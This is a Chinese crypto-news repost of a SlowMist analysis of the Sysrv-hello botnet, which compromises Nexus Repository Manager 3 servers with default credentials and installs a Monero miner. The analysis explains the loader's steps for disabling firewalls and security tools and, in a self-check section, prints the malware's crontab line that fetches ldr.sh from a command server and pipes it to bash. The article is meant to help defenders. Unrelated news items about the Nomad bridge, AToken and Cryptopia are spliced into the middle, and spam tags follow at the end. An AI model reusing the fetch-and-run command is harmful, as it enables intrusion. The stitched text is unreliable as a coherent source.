慢霧：技術拆解 Sysrv-hello 僵尸網絡入侵原理_TOKE:TOS Token

攻擊路徑

Sysrv-hello僵尸網絡對云上NexusRepositoryManager3存在默認帳號密碼的服務器進行攻擊，Maven私服部署會用到NexusRepositoryManager3，由于Maven是個流行服務，所以也給了Sysrv-hello僵尸網絡的大范圍感染機會。

當NexusRepositoryManager3服務對外網開放且存在默認賬號密碼時，Sysrv-hello就可以直接掃描入侵，利用NexusRepositoryManager3的Tasks功能模塊直接運行惡意腳本達到入侵服務器的目的。

慢霧：跨鏈互操作協議Nomad橋攻擊事件簡析:金色財經消息，據慢霧區消息，跨鏈互操作協議Nomad橋遭受黑客攻擊，導致資金被非預期的取出。慢霧安全團隊分析如下：

1. 在Nomad的Replica合約中，用戶可以通過send函數發起跨鏈交易，并在目標鏈上通過process函數進行執行。在進行process操作時會通過acceptableRoot檢查用戶提交的消息必須屬于是可接受的根，其會在prove中被設置。因此用戶必須提交有效的消息才可進行操作。

2. 項目方在進行Replica合約部署初始化時，先將可信根設置為0，隨后又通過update函數對可信根設置為正常非0數據。Replica合約中會通過confirmAt映射保存可信根開始生效的時間以便在acceptableRoot中檢查消息根是否有效。但在update新根時卻并未將舊的根的confirmAt設置為0，這將導致雖然合約中可信根改變了但舊的根仍然在生效狀態。

3. 因此攻擊者可以直接構造任意消息，由于未經過prove因此此消息映射返回的根是0，而項目方由于在初始化時將0設置為可信根且其并未隨著可信根的修改而失效，導致了攻擊者任意構造的消息可以正常執行，從而竊取Nomad橋的資產。

綜上，本次攻擊是由于Nomad橋Replica合約在初始化時可信根被設置為0x0，且在進行可信根修改時并未將舊根失效，導致了攻擊可以構造任意消息對橋進行資金竊取。[2022/8/2 2:52:59]

入侵到服務器后會自動下載執行ldr.sh文件，該文件主要功能：1.禁用Linux服務器防火墻(ufw)及清空iptables2.刪除aliyun、yunjing等主機安全軟件3.禁用apparmor、selinux、watchdog等安全機制4.刪除其他競品5.下載門羅幣挖礦程序進行挖礦，文件與進程名為network016.下載第二個木馬sysrv進行更高級操作7.在crontab里加上尾巴

慢霧：AToken錢包疑似遭受攻擊 用戶反饋錢包中資產被盜:據慢霧區情報，近期 AToken 錢包(atoken.com)疑似遭受到攻擊，用戶在使用 AToken 錢包后，幣被偷偷轉移走。目前已經有較多的用戶反饋錢包中的資產被盜。AToken 錢包官方推特在2021年12月20日發布了停止運營的聲明。官方 TG 頻道中也有多位用戶反饋使用 AToken 錢包資產被盜了，但是并沒有得到 AToken 團隊的回復和處理。

如果有使用 AToken 錢包的用戶請及時轉移資產到安全的錢包中。具體可以參考如下操作：

1. 立即將 AToken 錢包中的相關的資產轉移到新的錢包中。

2. 廢棄導入 AToken 或者使用 AToken 生成的助記詞或私鑰的錢包。

3. 參考慢霧安全團隊梳理的數字資產安全解決方案，對數字資產進行妥善的管理。

4. 留存相應有問題的 AToken 錢包 APP 的安裝包，用于后續可能需要的取證等操作。

5. 如果資產已經被盜，可以先梳理被盜事件的時間線，以及黑客的相關地址 MistTrack 可以協助挽回可能的一線希望。[2022/2/9 9:39:46]

第二個木馬sysrv的主要功能：1.確保門羅幣挖礦程序network01正常運行2.進行蠕蟲傳播，隨機掃描其他IP服務，同樣進行NexusRepositoryManager3漏洞利用，同時也會嘗試入侵MySQL、Tomcat、WebLogic等服務

動態 | 慢霧：Cryptopia被盜資金發生轉移:據慢霧科技反洗錢(AML)系統監測顯示，Cryptopia攻擊者分兩次轉移共20,843枚ETH，價值超380萬美元。目前資金仍停留在 0x90d78A49 和 0x6D693560 開頭的兩個新地址，未向交易所轉移。據悉，今年早些時候加密貨幣交易所Cryptopia遭受了黑客攻擊，價值超過1600萬美元的以太坊和ERC-20代幣被盜。[2019/11/17]

自查方法

進程：network01sysrv

文件：/tmp/network01/tmp/sysrv/tmp/flag.txt

crontab：echo"*/9****(curl-fsSL$cc/ldr.sh||wget-q-O-$cc/ldr.sh)|bash>/dev/null2>&1"|crontab-

端口：52013

存在以上這些，停止備份樣本后刪除。

加固建議

刪除NexusRepositoryManager3Tasks里的惡意代碼NexusRepositoryManager3嚴禁外網訪問，嚴禁默認賬號密碼NexusRepositoryManager3升級為最新版本被入侵服務器備份重要數據后，重配置或重做檢查被入侵服務器是否存在直接訪問生產網其他服務的能力，存在則在生產網其他服務所在的服務器上進一步分析是否有異常免責聲明：作為區塊鏈信息平臺，本站所發布文章僅代表作者個人觀點，與鏈聞ChainNews立場無關。文章內的信息、意見等均僅供參考，并非作為或被視為實際投資建議。

本文來源于非小號媒體平臺：

慢霧科技

現已在非小號資訊平臺發布68篇作品，

非小號開放平臺歡迎幣圈作者入駐

入駐指南：

/apply_guide/

本文網址：

/news/9606255.html

免責聲明：

1.資訊內容不構成投資建議，投資者應獨立決策并自行承擔風險

2.本文版權歸屬原作所有，僅代表作者本人觀點，不代表非小號的觀點或立場

上一篇：

深入解析MakeDao在新周期里的機遇和風險

Tags：TOKETOKENKENTOKRDCTokenbitkertokenTOS Tokenimtoken里的usdt提現人民幣教程

加密貨幣